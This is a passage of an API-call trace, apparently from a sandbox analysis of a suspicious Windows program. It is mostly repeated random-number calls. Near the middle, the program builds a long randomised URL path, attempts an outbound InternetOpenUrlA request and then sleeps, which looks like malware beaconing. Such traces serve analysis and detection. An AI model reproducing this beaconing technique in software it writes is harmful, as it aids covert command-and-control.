hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02ac7, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a02ac7) returned 0x0 [0246.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0246.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.695] GetProcessHeap () returned 0x440000 [0246.695] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0246.696] lstrcpyA (in: lpString1=0x472f30, lpString2="P* \x03" | out: lpString1="P* \x03") returned="P* \x03" [0246.696] lstrcatA (in: lpString1="P* \x03", lpString2="/ul1acZTokpX9wOu3Ton7xly/vag7xvxVnm8sqYjcwcbfd0vpdd9/39akqTtlvgwYslupqfnH2e/Vmvs75rh3sywg2sa4mMQmgod3c79gonMs7awxzun1m/RO3hvgl3xz20mzJy/" | out: lpString1="P* \x03/ul1acZTokpX9wOu3Ton7xly/vag7xvxVnm8sqYjcwcbfd0vpdd9/39akqTtlvgwYslupqfnH2e/Vmvs75rh3sywg2sa4mMQmgod3c79gonMs7awxzun1m/RO3hvgl3xz20mzJy/") returned="P* \x03/ul1acZTokpX9wOu3Ton7xly/vag7xvxVnm8sqYjcwcbfd0vpdd9/39akqTtlvgwYslupqfnH2e/Vmvs75rh3sywg2sa4mMQmgod3c79gonMs7awxzun1m/RO3hvgl3xz20mzJy/" [0246.696] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0246.696] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P* \x03/ul1acZTokpX9wOu3Ton7xly/vag7xvxVnm8sqYjcwcbfd0vpdd9/39akqTtlvgwYslupqfnH2e/Vmvs75rh3sywg2sa4mMQmgod3c79gonMs7awxzun1m/RO3hvgl3xz20mzJy/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0246.696] GetProcessHeap () returned 0x440000 [0246.696] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0246.696] GetProcessHeap () returned 0x440000 [0246.696] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02a50 | out: hHeap=0x440000) returned 1 [0246.697] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0246.697] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0246.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0246.697] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0246.697] Sleep (dwMilliseconds=0x13977) [0246.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0246.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.883] GetProcessHeap () returned 0x440000 [0246.883] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17840 [0246.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17841, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a17841) returned 0x0 [0246.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0246.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0246.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0246.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17863, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a17863) returned 0x0 [0246.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0246.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0246.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: 